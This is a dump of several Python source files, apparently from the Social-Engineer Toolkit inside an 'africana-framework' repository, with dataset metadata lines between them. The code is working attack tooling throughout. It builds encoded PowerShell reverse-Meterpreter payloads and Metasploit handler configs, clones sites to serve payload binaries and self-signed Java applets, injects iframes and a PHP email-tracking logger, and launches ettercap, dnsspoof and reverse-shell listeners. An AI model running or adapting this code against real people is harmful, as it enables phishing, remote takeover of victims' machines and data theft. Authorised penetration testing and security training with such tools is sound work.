powershell_solo = check_options("POWERSHELL_SOLO")
# check if port is there
port = check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(userconfigpath + "payload_options.shellcode"):
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if validate_ip(ipaddr) == False:
powershell_inject_x86 = "windows/meterpreter/reverse_https"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
print_status(
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = open(
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
(powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
        # if port.options isn't there then prompt
else:
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on":
if pyinjection == "off":
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
        # don't cycle through if there's a blank
if ports != "":
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
port_check = check_ports(
"%s/meta_config_multipyinjector" % (userconfigpath), ports)
if port_check == False:
filewrite = open(
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
filewrite = open("%s/meta_config" % (userconfigpath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
if port_check == False:
filewrite = open("%s/meta_config" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = ""
# read in the file we need for parsing
fileopen = open(userconfigpath + "payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
print_status("Generating x86-based powershell injection code...")
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if it's turned off
if multi_injection == "off":
if pyinjection == "off":
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print(x86)
filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
filewrite.write(x86)
filewrite.close()
print_status("Finished generating powershell injection bypass.")
print_status("Encoded to bypass execution restriction policy...")
| 8,566 | Python | .py | 178 | 38.893258 | 153 | 0.628961 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,828 | spawn.py | CHEGEBB_africana-framework/externals/set/src/html/spawn.py | #!/usr/bin/env python3
import os
import sys
import re
import socket
import subprocess
from src.core.setcore import *
#python 3 compatibility
try: import thread
except ImportError: import _thread as thread
import shutil
import re
import threading
import socket
import datetime
# set current path
definepath = os.getcwd()
# check os
operating_system = check_os()
# set default value for automatic listener
automatic_listener = ""
# specify base msf_path
msf_path = ""
try: module_reload(pexpect)
except: import pexpect
# see if we are tracking emails
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = check_options("APPLET_NAME=")
if applet_name == "":
applet_name = generate_random_string(6, 15) + ".jar"
update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if check_options("CUSTOM_EXE="):
custom = 1
if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
# here we need to modify the java applet to recognize custom attribute
        fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# we randomize param name so static sigs cant be used
goat_random = generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="%s"' % (goat_random))
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# see if we are using setshell
set_payload = ""
if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
##########################################################################
#
# Start of the SET Web Server for multiattack, java applet, etc.
#
##########################################################################
def web_server_start():
# define if use apache or not
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
apache = 1
if operating_system == "windows":
apache = 0
# specify the web port
web_port = check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter your ipaddress: ")
# Grab custom or set defined
if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# grab web attack selection
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
# if it doesn't exist just set a default template
if not os.path.isfile(userconfigpath + "attack_vector"):
attack_vector = "nada"
# Sticking it to A/V below
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack_harv = "on"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack_harv = "on"
# open our config file that was specified in SET
if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here
for line in fileopen:
line = line.rstrip()
# look for config file and parse for URL
match = re.search("URL=", line)
if match:
line = line.split("=")
# define url to clone here
url = line[1].rstrip()
# if we didn't create template then do self
if not os.path.isfile(userconfigpath + "site.template"):
template = "SELF"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
fileopen = open("index.template", "r").readlines()
filewrite = open("index.html", "w")
if attack_vector == "java":
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
filewrite.close()
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
counter = 0
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
filewrite.close()
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid':
if attack_vector != 'hijacking':
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(userconfigpath + "" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (userconfigpath, applet_name))
shutil.copyfile(userconfigpath + "%s" % (applet_name),
"%s/web_clone/%s" % (userconfigpath, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (userconfigpath, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (userconfigpath, definepath, mac))
if os.path.isfile(userconfigpath + "msf.exe"):
win = check_options("MSF.EXE=")
shutil.copyfile(userconfigpath + "msf.exe",
"%s/web_clone/%s" % (userconfigpath, win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile(userconfigpath + "custom.exe"):
shutil.copyfile(userconfigpath + "msf.exe",
userconfigpath + "web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(userconfigpath + "web_clone/msf.exe",
userconfigpath + "web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(userconfigpath + "docbase.file"):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET>
</HTML>""" % (ipaddr))
if os.path.isfile(userconfigpath + "web_clone/site.html"):
os.remove(userconfigpath + "web_clone/site.html")
shutil.copyfile(userconfigpath + "web_clone/index.html",
userconfigpath + "web_clone/site.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(docbase)
filewrite.close()
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if apache == 0:
if multiattack_harv == 'off':
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet
# attack
path = (userconfigpath + "web_clone/")
try:
import multiprocessing
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except KeyboardInterrupt:
                    p.terminate()
except Exception as e:
import thread
thread.start_new_thread(webserver.start_server, (web_port, path))
if apache == 0:
if os.path.isfile(userconfigpath + "meta_config"):
msf_path = meta_path()
#print("You will need to launch the listener on your own, execute in a different shell the following command if using Metasploit:")
child = pexpect.spawn("%smsfconsole -r %s/meta_config" % (msf_path, userconfigpath))
child.interact()
                pause = input("Press <return> when you want to shut down the web server. It is currently listening.")
# Handle KeyboardInterrupt
except KeyboardInterrupt:
exit_set()
# Handle Exceptions
except Exception as e:
print(e)
log(e)
print(bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??")
print("[!] There was an issue, printing error: " + str(e) + bcolors.ENDC)
print(bcolors.ENDC + "Do you want to try to stop Apache? y/n")
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen("/etc/init.d/nginx stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = (userconfigpath + "web_clone/")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
print(bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC)
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = check_options("CUSTOM_EXE=")
if custom_exe != 0:
while 1:
# try block inside of loop, if control-c detected, then
# exit
try:
print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = input(
bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
# handle keyboard interrupt
except KeyboardInterrupt:
print(bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC)
                    try: p.terminate()
except: pass
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
filewrite = open("%s/harvester_%s.txt" % (apache_path, now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(apache_path, now), shell=True).wait()
# here we specify if we are tracking users and such
fileopen = open("%s/index.html" % (apache_path), "r")
data = fileopen.read()
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>\n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */""" % (now))
filewrite = open("%s/index.php" % (apache_path), "w")
filewrite.write(data)
filewrite.close()
print_status("All files have been copied to %s" % (apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = meta_path()
# define if use apache or not
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
apache = 1
if operating_system == "windows":
apache = 0
web_server = check_config("WEB_PORT=")
# setup multi attack options here
multiattack = "off"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack = "on"
if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack = "on"
# Grab custom or set defined
template = ""
if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# Test to see if something is running on port 80, if so throw error
try:
web_port = check_config("WEB_PORT=")
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
# if apache isnt running and something is on 80, throw error
if apache == 0:
print_error(
"ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat
# or something like that)
if operating_system == "nt":
exit_set()
# if we are running posix then check to see what the process is
# first
if operating_system == "posix":
# if we detect an apache installation
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input(
"[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status(
"Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error(
"Exit whatever is listening and restart SET")
exit_set()
# if it couldn't connect to localhost, we are good to
# go and continue forward
except Exception:
print_status(
"Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error(
"Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
# if apache is set to run let the user know we are good to go
if operating_system == "posix":
if apache == 1:
try:
web_port = check_config("WEB_PORT=")
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
print_status(
"Apache appears to be running, moving files into Apache's home")
except:
print_error("Exit whatever is listening and restart SET")
exit_set()
# except all issues and throw out to here
except Exception as e:
# if we are using apache
if apache == 1:
print_error("Error:Apache does not appear to be running.")
print_error("Start it or turn APACHE off in /etc/setoolkit/set.config")
print_status("Attempting to start Apache manually...")
apache_counter = 0
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd start", shell=True).wait()
apache_counter = 1
if apache_counter == 0:
print_error("ERROR: Unable to start Apache through SET,")
print_error(
"ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error("Exiting the Social-Engineer Toolkit...")
exit_set()
# except KeyboardInterrupt
except KeyboardInterrupt:
print_warning("KeyboardInterrupt detected, bombing out to the prior menu.")
# grab metasploit root directory
if operating_system == "posix":
msf_path = meta_path()
# Launch SET web attack and MSF Listener
try:
if multiattack == "off":
print((bcolors.BLUE + "\n***************************************************"))
print((bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack."))
print((bcolors.BLUE + "***************************************************"))
print((bcolors.PURPLE +
"\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC))
if apache == 1:
print((bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
if apache == 1:
print_warning("Apache appears to be configured in the SET (set_config)")
print_warning("You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
exit_set()
print(bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")
web_server_start()
# if we are using ettercap
if os.path.isfile(userconfigpath + "ettercap"):
fileopen5 = open(userconfigpath + "ettercap", "r")
for line in fileopen5:
ettercap = line.rstrip()
# run in background
ettercap = ettercap + " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(userconfigpath + "meta_config"):
if ("CUSTOM" not in template) or ("SELF" not in template):
print_info("Launching MSF Listener...")
print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener
automatic_listener = check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
try:
module_reload(pexpect)
except:
import pexpect
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn("%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
# check if we want to deliver emails or track users that click the
# link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try:
module_reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
if custom != 1:
child1.interact()
if os.path.isfile(userconfigpath + "set.payload"):
port = check_options("PORT=")
# grab configuration
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
if set_payload == "SETSHELL":
print("\n")
print_info("Launching the SET Interactive Shell...")
try:
module_reload(src.payloads.set_payloads.listener)
except:
import src.payloads.set_payloads.listener
if set_payload == "SETSHELL_HTTP":
print("\n")
print_info("Launching the SET HTTP Reverse Shell Listener...")
try:
module_reload(src.payloads.set_payloads.set_http_server)
except:
import src.payloads.set_payloads.set_http_server
if set_payload == "RATTE":
print_info(
"Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
# prep ratte if its posix
if operating_system == "posix":
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
os.system("src/payloads/ratte/ratteserver %s" % (port))
# if not then run it in windows
if operating_system == "windows":
if not os.path.isfile(userconfigpath + "ratteserver.exe"):
shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
                os.system(userconfigpath + "ratteserver %s" % (port))
# handle errors
except Exception as e:
log(e)
pass
try:
if apache == 1:
input(bcolors.ENDC + "\nPress [return] when finished.")
child.close()
child1.close()
# close ettercap thread, need to launch from here eventually instead of executing
# an underlying system command.
if operating_system == "posix":
subprocess.Popen(
"pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
# kill dnsspoof if there
subprocess.Popen(
"pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
if apache == 1:
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" %
(apache_path, apache_path, apache_path), shell=True).wait()
except:
try:
child.close()
except:
pass
except KeyboardInterrupt:
sys.exit(1)
# if we turned automatic listener off
if automatic_listener == "off" or multiattack == "on":
if automatic_listener == "off":
print_warning("Listener is turned off in /etc/setoolkit/set.config!")
if automatic_listener == "off" or template == "CUSTOM" or template == "SELF":
while 1:
try:
print_warning(
"\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = input(
"\nPress {control -c} to return to the main menu when you are finished.")
except KeyboardInterrupt:
break
if apache == 1:
# if we are running apache then prompt to exit this menu
print_status(
"Everything has been moved over to Apache and is ready to go.")
return_continue()
# we stop the python web server when we are all finished
if apache == 0:
# specify the web port
web_port = check_config("WEB_PORT=")
# stop the web server
try:
import src.core.webserver as webserver
except:
module_reload(src.core.webserver)
webserver.stop_server(web_port)
# call the cleanup routine
cleanup = check_config("CLEANUP_ENABLED_DEBUG=")
if cleanup.lower() != "on":
cleanup_routine()
| 30,446 | Python | .py | 617 | 36.606159 | 443 | 0.550632 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,829 | fasttrack_http_server.py | CHEGEBB_africana-framework/externals/set/src/html/fasttrack_http_server.py | #!/usr/bin/env python3
# coding=utf-8
import os
import sys
definepath = os.getcwd()
sys.path.append(definepath)
import src.core.setcore as core
core.start_web_server_unthreaded(os.path.join(core.userconfigpath, "web_clone"))
| 227 | Python | .py | 8 | 27.125 | 80 | 0.801843 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,830 | web_start.py | CHEGEBB_africana-framework/externals/set/src/html/web_start.py | #!/usr/bin/env python3
# coding=utf-8
# This is just a simple import for web_start
import sys
import src.core.setcore as core
core.debug_msg(core.mod_name(), "importing 'src.html.spawn'", 1)
sys.path.append("src/html")
try:
import src.html.spawn
except:
pass
| 269 | Python | .py | 11 | 22.545455 | 64 | 0.746094 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,831 | self_sign.py | CHEGEBB_africana-framework/externals/set/src/html/unsigned/self_sign.py | #!/usr/bin/env python3
# coding=utf-8
import os
import subprocess
import src.core.setcore as core
#########################
# Simple signer for signing the java applet attack
#########################
# create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass
# mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
os.chdir("src/html/unsigned")
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
core.print_error("*** WARNING ***")
core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
core.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = core.generate_random_string(10, 30)
# generate a keystore and signing key that will be used to sign the applet
subprocess.Popen("keytool -genkey -alias {0} "
"-keystore mykeystore "
"-keypass mykeypass "
"-storepass mystorepass".format(random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore "
"-storepass mystorepass "
"-keypass mykeypass "
"-signedjar Signed_Update.jar unsigned.jar {0}".format(random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar {0}".format(core.userconfigpath), shell=True)
# move back to original directory
os.chdir("../../../")
core.print_status("Java Applet is now signed and will be imported into the website")
| 1,850 | Python | .py | 43 | 39.162791 | 127 | 0.712375 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,832 | verified_sign.py | CHEGEBB_africana-framework/externals/set/src/html/unsigned/verified_sign.py | #!/usr/bin/env python3
# coding=utf-8
import os
import shutil
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# keytool -import -storepass pw -alias MyCert -file mycert.spc
# jarsigner -verbose -storepass <pw> -keypass <pw> unsigned.jar MyCert
###########################################################
# #
# SET - Use codesigning for the java applet attack vector #
# #
###########################################################
# based on the new update to Java, this no longer works and just shows a big "UNKNOWN".
# to get around that you can purchase your own digital certificate through
# verisign/thawte
# grab current path
definepath = core.definepath()
# print warning message that we need to install sun-java or openjdk
print("""
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat involved. It requires you to have a business name and
to prove the legitimacy of that business. That means you have to register a business with the state and handle the related paperwork.
